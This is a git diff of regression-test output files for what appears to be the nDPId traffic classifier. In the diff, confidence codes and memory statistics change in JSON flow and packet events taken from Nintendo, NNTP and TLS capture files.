{"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1500731320764,"flow_last_seen":1500731321914,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1500731343274,"flow_last_seen":1500731343874,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731342860,"flow_last_seen":1500731343591,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":756,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","packets-captured":1000,"packets-processed":996,"total-skipped-flows":0,"total-l4-payload-len":289225,"total-not-detected-flows":0,"total-guessed-flows":6,"total-detected-flows":15,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":132,"global_ts_msec":1500731348756} ~~~~~~~~~~~~~~~~~~~~ SUMMARY 
~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1000/996 @@ -138,9 +138,9 @@ ~~ total active/idle flows...: 21/21 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5931383 bytes -~~ total memory freed........: 5931383 bytes -~~ total allocations/frees...: 119205/119205 +~~ total memory allocated....: 6065017 bytes +~~ total memory freed........: 6065017 bytes +~~ total allocations/frees...: 121967/121967 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 456 chars ~~ json string max len.......: 1399 chars diff --git a/test/results/nntp.pcap.out b/test/results/nntp.pcap.out index 3f545f608..cc677b438 100644 --- a/test/results/nntp.pcap.out +++ b/test/results/nntp.pcap.out 
@@ -4,8 +4,8 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1258844926423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1258844926423,"pkt":"AEBj1fcCABQqM3R+CABFAAA8fZdAAEAGv7nAqL4UwKi+BdlOAHfZ0lWUAAAAAKACFtABzgAAAgQFtAQCCAoAyCgDAAAAAAEDAwY="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1258844926423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1258844926423,"pkt":"ABQqM3R+AEBj1fcCCABFAAA8AABAAEAGPVHAqL4FwKi+FAB32U6dVo1l2dJVlaASFqBxAwAAAgQFtAQCCAoKz1tgAMgoAwEDAwQ="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258844926423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1258844926423,"pkt":"AEBj1fcCABQqM3R+CABFAAA0fZhAAEAGv8DAqL4UwKi+BdlOAHfZ0lWVnVaNZoAQAFy2EAAAAQEICgDIKAMKz1tg"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1258844926423,"flow_last_seen":1258844926441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1258844926441,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1258844926423,"flow_last_seen":1258844993785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4921,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1258844993785,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1258844926423,"flow_last_seen":1258844926441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1258844926441,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} 
+00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1258844926423,"flow_last_seen":1258844993785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4921,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1258844993785,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"nntp.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":32,"total-skipped-flows":0,"total-l4-payload-len":4921,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1258844993785} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 32/32 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872419 bytes -~~ total memory freed........: 5872419 bytes -~~ total allocations/frees...: 118147/118147 +~~ total memory allocated....: 6006053 bytes +~~ total memory freed........: 6006053 bytes +~~ total allocations/frees...: 120909/120909 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 684 chars diff --git a/test/results/no_sni.pcap.out b/test/results/no_sni.pcap.out index 54e9f4678..1b327d165 100644 
--- a/test/results/no_sni.pcap.out +++ b/test/results/no_sni.pcap.out 
@@ -2,21 +2,21 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1604822444474} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444474,"flow_last_seen":1604822444474,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1604822444474,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1604822444474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1604822444474,"pkt":"EBMxuRBeeDHBvV4kCABFAABPAABAAEAGFoDAqAF3aBD5+ciDAbvkc0fPNh\/971AYEABWfwAAFwMDACKpSo7n5l1NtXHPvYJ17DEID+iXo6vcSBPbb4QBvLt6N\/RR"} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444474,"flow_last_seen":1604822444474,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1604822444474,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444474,"flow_last_seen":1604822444474,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1604822444474,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1604822444475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444475,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGFo\/AqAF3aBD5+ciDAbvkc0f2Nh\/971AYEAB\/fAAAFwMDABPsQXLhLYpNcnxO3uEm2chWzCNj"} 
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1604822444475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822444475,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGFqfAqAF3aBD5+ciDAbvkc0gONh\/971AREABQ2gAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444486,"flow_last_seen":1604822444486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822444486,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1604822444486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444486,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGFo\/AqAF3aBD5+cmWAbsdU0ZpAAAAALAC\/\/\/IBQAAAgQFtAEDAwYBAQgKKlLxbAAAAAAEAgAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1604822444624,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822444624,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADkGHZtoEPn5wKgBdwG7yZbnV+zfHVNGaoAS\/\/9HygAAAgQFeAEBBAIBAwMK"} 
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1604822444624,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822444624,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGFqfAqAF3aBD5+cmWAbsdU0Zq51fs4FAQEAB4YwAA"} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444486,"flow_last_seen":1604822444629,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":616,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1604822444629,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1604822444486,"flow_last_seen":1604822444807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":1474,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1604822444807,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444486,"flow_last_seen":1604822444629,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":616,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1604822444629,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1604822444486,"flow_last_seen":1604822444807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":1474,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1604822444807,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444913,"flow_last_seen":1604822444913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822444913,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1604822444913,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444913,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGlCjAqAF3aBB8YMmcAbs\/DuN6AAAAALAC\/\/+FPgAAAgQFtAEDAwYBAQgKKlLy+gAAAAAEAgAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1604822445034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822445034,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADkGmzRoEHxgwKgBdwG7yZyEa\/jPPw7je4AS\/\/9djQAAAgQFeAEBBAIBAwMK"} 
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1604822445034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822445034,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGlEDAqAF3aBB8YMmcAbs\/DuN7hGv40FAQEACOJgAA"} -00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444913,"flow_last_seen":1604822445039,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":947,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1604822445039,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":47,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822444913,"flow_last_seen":1604822445135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822445135,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444913,"flow_last_seen":1604822445039,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":947,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1604822445039,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":47,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822444913,"flow_last_seen":1604822445135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822445135,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447227,"flow_last_seen":1604822447227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447227,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1604822447227,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447227,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGSmLAqAF3aBHGJcmzAbtjbUROAAAAALAC\/\/+t4gAAAgQFtAEDAwYBAQgKKlL7RgAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447249,"flow_last_seen":1604822447249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447249,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
